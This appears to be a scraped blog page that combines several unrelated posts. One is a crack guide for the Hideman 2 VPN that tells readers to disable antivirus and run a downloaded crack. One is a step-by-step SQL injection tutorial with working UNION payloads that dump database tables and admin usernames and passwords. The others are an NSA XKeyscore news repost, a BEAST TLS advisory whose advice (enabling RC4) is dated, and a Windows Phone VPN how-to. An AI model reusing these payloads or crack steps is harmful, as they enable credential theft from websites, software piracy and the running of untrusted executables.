HideMan2 Premium vpn Life Time

Hideman 2

Hideman application creates VPN connection to one of our servers located in 16 countries around the world. We try to add new servers as fast as we can.
VPN connection protects your privacy and increase security level.
This crack will remove the hour limit of Hideman 2,letting you to be connected to the VPN Server forever

• How to Crack ?

  1. Install Hideman 2
  2. Exit from Hideman using system tray icon (important)
  3. Turn off any virus guards
  4. Run Hideman 2 Crack, and press crack button
  5. If asked browse and select ‘Hideman.exe’ file from Hideman installation path
  6. Done   
  How to fix Disconnected issue ?
  sometimes you will continuously get disconnected message in hideman after applying crack.follow the steps given below to fix it
  
• Run Hideman
• Press +1/1 button under Hours (nothing will happen other than loading,its OK)
• Go to Payment Menu > Click 1 Month option (it will open a web page,just close it)
• Now close Hideman completely using system tray icon
• Go to Hideman installation path and delete ‘pref.cdat’ file (example path : C:\Program Files\Hideman\bin)
• Now open Hideman and it will work normally [If this didnt work, re-apply the crack at step 5]

 Download:

HideMan2+cracke.rar 

Read more ...

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

---

---

---

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

---

---

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection

Read more ...

Beware of NSA If You Are Privacy Conscious and Security Enthusiast Friday,

 

 

We all are aware of the National Security Agency’s (NSA) mass surveillance program to track non-Americans. Thanks to former NSA contractor Edward Snowden, who provided confidential documents about the widely spread surveillance programs conducted by the government intelligence agency such as NSA and GCHQ.

A recent story about NSA surveillance broke when a German public broadcaster ARD published that the Agency is using its surveillance program XKeyScore to target users who use encryption and traffic anonymizing software, including Tor Network for anonymous Web browsing and Linux-based Tails operating system in an effort to keep tracks of people outside the US.

XKeyScore is a powerful NSA surveillance program that collects and sorts intercepted data, which came to limelight in documents leaked by former NSA contractor Edward Snowden last summer, but the greater detail in an investigation conducted by American security expert and Tor Project member Jacob Appelbaum, Aaron Gibsom, and Leif Ryge shows that how the agency monitors people trying to protect their privacy online, may have not come from the documents Snowden provided to journalists.

Tor network offers users browse the Internet anonymously and is mostly used by activists, journalists to conceal their online activities from prying eyes. Whereas, Tails is a live media Linux distro designed boot into a highly secure desktop environment and is different because it is aimed at the privacy conscious “normal user” rather than government workers.

The documents for the NSA’s XKeyscore Internet surveillance system also indicate that the NSA was apparently capturing the traffic of anyone reading a wide range of articles on Linux Journal website and gathering up information of the visitors.

The documents provided by Snowden on X-Keyscore last year indicated that the surveillance program allowed NSA officials to obtain a person's phone number or email address, read the content of email, and track full Internet activity including browsing history without bothering the need of any warrant.

The analysis of the top-secret source code for X-Keyscore the NSA uses to conduct internet surveillance indicates that the program targeted at least two German Tor Directory Authority servers, one based in Berlin and the other in Nuremberg, as well as individuals using Tor.

It’s not just Tor and Tails the NSA is collecting data from. The report also reveals this code:

// START_DEFINITION
/*These variables define terms and websites relating to the TAILs (The Amnesic Incognito Live System) software program, a comsec mechanism advocated by extremists on extremist forums. */
$TAILS_terms=word('tails' or 'Amnesiac Incognito Live System') and word('linux' or ' USB ' or ' CD ' or 'secure desktop' or ' IRC ' or 'truecrypt' or ' tor ');
$TAILS_websites=('tails.boum.org/') or ('linuxjournal.com/content/linux*');
// END_DEFINITION

"Months of investigation by the German public television broadcasters NDR and WDR (ARD), drawing on exclusive access to top secret NSA source code, interviews with former NSA employees, and the review of secret documents of the German government reveal that not only is the server in Nuremberg under observation by the NSA, but so is virtually anyone who has taken an interest in several well-known privacy software systems," reads the ARD report.

However, the source code also reveals that the NSA has targeted a German student who runs a Tor node, under the XKeyscore program. Still, it is unclear how ARD obtained the NSA source code, and the broadcaster made no mention in its report of Snowden, or the documents he leaked.

UPDATE

In response to ARD's allegations relating to the details uncovered in the Xkeyscore source code, the NSA provided the following statement:

“NSA collects only what it is authorized by law to collect for valid foreign intelligence purposes - regardless of the technical means used by foreign intelligence targets. The communications of people who are not foreign intelligence targets are of no use to the agency.

In January, President Obama issued U.S. Presidential Policy Directive 28, which affirms that all persons - regardless of nationality - have legitimate privacy interests in the handling of their personal information, and that privacy and civil liberties shall be integral considerations in the planning of U.S. signals intelligence activities.

The president's directive also makes clear that the United States does not collect signals intelligence for the purpose of suppressing or burdening criticism or dissent, or for disadvantaging persons based on their ethnicity, race, gender, sexual orientation, or religion.

XKeyscore is an analytic tool that is used as a part of NSA's lawful foreign signals intelligence collection system. Such tools have stringent oversight and compliance mechanisms built in at several levels. The use of XKeyscore allows the agency to help defend the nation and protect U.S. and allied troops abroad. All of NSA's operations are conducted in strict accordance with the rule of law, including the President's new directive.”

Read more ...

SSL/TLS BEAST

SSL/TLS BEAST
Researchers have discovered a serious vulnerability in TLS v1.0 and SSL v3.0 that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser. This vulnerability can be exploited using a new cookie-based technique called “BEAST” (“Browser Exploit Against SSL/TLS”) that takes advantage of block-oriented cipher implementation such as AES and TripleDES.

Which file transfer protocols are affected?

Any interactive HTTPS-based web-based transfer application that relies on SSL/TLS will probably be affected.   Web-based “file send” applications will almost certainly be affected.  Web services that use cookies to maintain an authenticated session after sign on will also be affected.
At the moment it appears that only protocols that make use of browser cookies are affected.  That means that the FTPS and AS2 protocols are safe for now, even if they use TLS v1.0 or SSL v3.0.
SFTP and other protocols that use encryption not based on SSL/TLS are of course not affected by BEAST.

Which vendors are affected?

Just about ALL of them.  Any on-premise product or cloud-based product that:

• allows end users to upload, download or send files through a web browser
• AND uses an SSL/TLS-secured channel (i.e., uses HTTPS)
• AND uses cookies (even memory-only cookies) to maintain user sessions after the initial sign on

 Recommendation

• CHOICE #1:
  • DISABLE TLS v1.0 support on your file transfer web interfaces
  • DISABLE SSL v.3.0 support
    • (as per this article, SSL v3.0 is also affected)
  • ENABLE TLS v.1.1 and TLS v.1.2 support
• CHOICE #2:
  • DISABLE AES and TripleDES encryption support on your file transfer web interfaces
    • (as per this article, both AES and TripleDES are affected)
  • ENABLE RC4 encryption support
• IN ALL CASES:
  • Keep SSL v.2.0 disabled
    • (you should have already done this years ago)
  • If you are using a managed file transfer gateway or proxy to terminate SSL/TLS sessions, remember to check those configurations too

If you apply our “CHOICE #1″ recommended configuration you will likely encounter some compatibility problems with end users whose web browsers do not support TLS v1.1 or v1.2.  To get around this issue you will need to have your users upgrade their browsers to editions that support TLS v1.1 (see partial list below) or have your end users use a different web browser.  (The latest version of Opera and IE both support TLS v1.1.)
If you apply our “CHOICE #2″ recommended configuration you will not be able to use your FIPS-valided AES or TripleDES algorithms on your SSL/TLS connections.  Rc4 is an older, secure but not FIPS-validated algorithm that is often used by browsers and servers by default.  (R6, R4′s successor, was a runner-up to become the new AES algorithm during the open competition about a decade ago.)  
BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies of 1,000 to 2,000 characters long will still take a minimum of a half hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of (the researchers’) claim that this time can be drastically shortened.
The decryption process is fast enough that it’s likely imperceptible users, and the researchers said that in a targeted attack, they likely could steal the cookie from a specific site within five minutes of loading the tool. Rizzo and Duong said that their attack exploits a vulnerability in the TLS 1.0 protocol that has been known for quite some time, but was thought to be unexploitable.”

What web browsers have been patched against this?

Opera is now patched!  (article)  It also supports TLS v1.1 – another fine choice!
IE is now patched! (article)

• Google Chrome will soon have a BEAST patch ready (article)
• Firefox has NOT yet promised a BEAST patch (article)CANNOT FIND any information about Safari/Webkit recognizing BEAST (please send me links!)
  • However, Oracle provided a Java plug-in patch for Firefox to make the most common exploit harder (article)
• 
  

A relatively fresh list of browsers that support more recent versions of TLS v1.1 is maintained here:
http://en.wikipedia.org/wiki/Transport_Layer_Security#Browser_implementations
Currently only Opera (version 10 or higher) and IE (version 8 or higher on Windows 2008 R2 or Windows 7) are listed with TLS v1.1 support.  Firefox does not currently support TLS v1.1, nor does Chrome or Safari.   However pressure to add TLS v1.1 support to those browsers has increased substantially since BEAST was announced.

What are some of the servers that support TLS v.1.1?

Microsoft IIS 7 (on Windows 2008 R2) supports TLS v.1.1 but it must be specially enabled.  (This affects web transfer applications that rely on IIS such as Ipswitch’s WS_FTP Server Web Transfer Module, WS_FTP Server Ad Hoc Module and MOVEit DMZ.)
Many other file transfer vendors ship their own web servers with their products – check with your vendor for specific guidance.

this post is taken from http://www.filetransferconsulting.com

Read more ...

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:

• Set up a workplace account to automatically get a VPN profile from your company.
• Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.

1. In the App list, tap Settings > VPN.
   
   
   
2. Tap and hold the VPN profile name, and then tap Edit.
3. In the User name and Password boxes, type your user name and password.
4. To connect to the VPN, do one of the following, depending on what type of profile you're using:
   • If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
   • If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. This icon appears when you're connected over Wi-Fi, and this one shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.

1. In the App list, tap Settings > VPN.
2. Set Status to On , and then tap Add .
3. In the Server name or IP address box, type the server name or IP address of your VPN server.
4. Tap Type and choose the type of VPN connection you want to create.
   If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
5. Tap Connect using, and choose the method you want to use to connect.
6. In the User name and Password boxes, type your user name and password.
7. To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On .
8. For Send all traffic, do one of the following:
   • To have all data you send and receive go over the VPN, set Send all traffic to On .
   • To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off , tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
9. In the Profile name box, type a name for your profile.
10. Tap Advanced, and then enter any additional settings you need to for your organization's VPN.
    You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
11. Press the Back button on your phone to go back to the Add profile screen, and then tap Save.

Read more ...